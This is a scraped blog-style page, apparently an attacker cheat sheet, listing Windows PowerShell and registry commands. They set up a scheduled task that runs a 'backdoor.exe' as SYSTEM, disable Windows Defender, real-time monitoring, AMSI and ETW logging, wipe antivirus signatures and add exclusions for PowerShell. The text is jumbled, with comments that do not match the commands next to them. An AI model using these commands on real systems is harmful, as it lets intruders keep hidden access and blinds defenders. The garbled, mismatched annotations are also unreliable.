![]() ![]() ![]() # OR $T = New-ScheduledTaskTrigger -Daily -At " 11:05:00 AM " $P = New-ScheduledTaskPrincipal "NT AUTHORITY\SYSTEM " -RunLevel Highest # Powershell $A = New-ScheduledTaskAction -Execute "cmd.exe " -Argument "/c C:\temp\backdoor.exe " $T = New-ScheduledTaskTrigger -Daily -At 9am Reg add "HKLM\Software\Policies\Microsoft\Windows Defender " /v "DisableAntiVirus " /t REG_DWORD /d "1 " /f Disable Windows Firewall Reg add "HKLM\Software\Policies\Microsoft\Windows Defender " /v "DisableAntiSpyware " /t REG_DWORD /d "1 " /f Reg delete "HKLM\Software\Policies\Microsoft\Windows Defender " /f Reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService " /v "Start " /t REG_DWORD /d "4 " /f # Disable Windows Defender Security Center PS > & "C:\Program Files\Windows Defender\MpCmdRun.exe " -RemoveDefinitions -All PS > & "C:\ProgramData\Microsoft\Windows Defender\Platform\.9-0\MpCmdRun.exe " -RemoveDefinitions -All # Remove signatures (if Internet connection is present, they will be downloaded again): # Wipe currently stored definitions # Location of MpCmdRun.exe: C:\ProgramData\Microsoft\Windows Defender\Platform\ MpCmdRun.exe -RemoveDefinitions -All Reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger " /v "Start " /t REG_DWORD /d "0 " /f PS C:\ > Set-MpPreference -DisableScriptScanning 1 # Blind ETW Windows Defender: zero out registry values corresponding to its ETW sessions PS C:\ > Set-MpPreference -DisableIOAVProtection $true # Disable AMSI (set to 0 to enable) PS C:\ > Set-MpPreference -DisableRealtimeMonitoring $true Get-MpComputerStatus # Disable scanning all downloaded files and attachments, disable AMSI (reactive) ![]() Set-MpPreference -DisableRealtimeMonitoring $true # Exclude a process / location Set-MpPreference -ExclusionProcess "word.exe ", "vmwp.exe " Add-MpPreference -ExclusionProcess 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ' Add-MpPreference -ExclusionPath C:\Video, C:\install ![]()
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |